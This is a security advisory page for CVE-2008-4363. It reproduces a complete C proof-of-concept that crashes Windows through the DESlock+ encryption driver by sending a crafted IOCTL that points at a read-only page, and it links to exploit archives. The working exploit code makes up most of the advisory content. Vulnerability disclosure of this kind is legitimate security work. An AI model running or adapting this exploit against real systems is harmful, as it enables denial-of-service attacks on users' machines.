|
 |
| SecurityReason | ||
| WLB | ||
| Services | ||
| RSS | ||
| Corporate | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
Home  SecurityAlert Database |
||||
SecurityAlert : 4342 CVE : CVE-2008-4363 CWE : CWE-20 SecurityRisk : High  (About) Remote Exploit : No Local Exploit : Yes Victim interaction required : No Exploit Available : No Credit : mu-b Published : 03.10.2008
Advisory Content : /* deslock-probe-read.c * * Copyright (c) 2008 by <mu-b@digit-labs.org> * * DESlock+ <= 3.2.7 local kernel DoS POC * by mu-b - Sat 19 Jul 2008 * * - Tested on: DLMFENC.sys 1.0.0.28 * * call to ProbeForRead with a user-definable address that * is eventually overwritten (should have been ProbeForWrite). * * http://www.cctmark.gov.uk/CCTMAwards/DataEncryptionSystemsLtd/tabid/103/Def ault.aspx * - I wonder what that says about CESG CCTM? * * - Private Source Code -DO NOT DISTRIBUTE - * http://www.digit-labs.org/ -- Digit-Labs 2008!@$! */ #include <stdio.h> #include <stdlib.h> #include <windows.h> #define DLMFENC_IOCTL 0x0FA4204C #define DLMFENC_FLAG 0xC001D00D #define ARG_SIZE(a) ((a-(sizeof (int)*2))/sizeof (void *)) struct ioctl_req { int flag; int req_num; void *arg[ARG_SIZE(0x20)]; }; static void xor_mask_req (struct ioctl_req *req) { DWORD i, pid; PCHAR ptr; pid = GetCurrentProcessId (); for (i = 0, ptr = (PCHAR) req; i < 0x0C; i++, ptr++) *ptr ^= pid; } int main (int argc, char **argv) { struct ioctl_req req; HANDLE hFile, hThread; DWORD rlen, dThread, nTotal, nFail; LPVOID zpage; BOOL result; printf ("DESlock+ <= 3.2.7 local kernel DoS PoC\n" "by: <mu-b@digit-labs.org>\n" "http://www.digit-labs.org/ -- Digit-Labs 2008!@$!\n\n"); fflush (stdout); hFile = CreateFileA ("\\\\.\\DLKPFSD_Device", FILE_EXECUTE, FILE_SHARE_READ|FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL); if (hFile == INVALID_HANDLE_VALUE) { fprintf (stderr, "* CreateFileA failed, %d\n", hFile); exit (EXIT_FAILURE); } zpage = VirtualAlloc (NULL, 0x1000, MEM_RESERVE|MEM_COMMIT, PAGE_READONLY); if (zpage == NULL) { fprintf (stderr, "* VirtualAlloc failed\n"); exit (EXIT_FAILURE); } printf ("* allocated page: 0x%08X [%d-bytes]\n", zpage, 0x1000); req.flag = DLMFENC_FLAG; req.req_num = 18; req.arg[0] = (void *) zpage; sleep (2000); xor_mask_req (&req); result = DeviceIoControl (hFile, DLMFENC_IOCTL, &req, sizeof req, &req, sizeof req, &rlen, 0); if (!result) { fprintf (stderr, "* DeviceIoControl failed\n"); exit (EXIT_FAILURE); } printf ("* hmmm, you didn't STOP the box?!?!\n"); CloseHandle (hFile); return (EXIT_SUCCESS); } References : http://securityreason.com/expldownload/1/4738/1 (Exploit) http://www.milw0rm.com/exploits/6498
http://www.frsirt.com/english/advisories/2008/2638
http://secunia.com/advisories/31921
http://digit-labs.org/files/exploits/deslock-probe-read.c  Feedback : If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com. |
||||
| Alert | ||
libc:fts_*() Multiple Denial of Service
The fts functions are provided for traversing UNIX file hierarchies... |
||
| Apache |  |
|
» Apache Tomcat 6.0.20 and |
||
» Apache Tomcat 6.0.20 and |
||
» Apache Tomcat 6.0.20 and |
||
| PHP | |
|
» PHP 5.2.12/5.3.1 |
||
- 2009-10-02| Copyright © SecurityReason.com. All Rights Reserved. |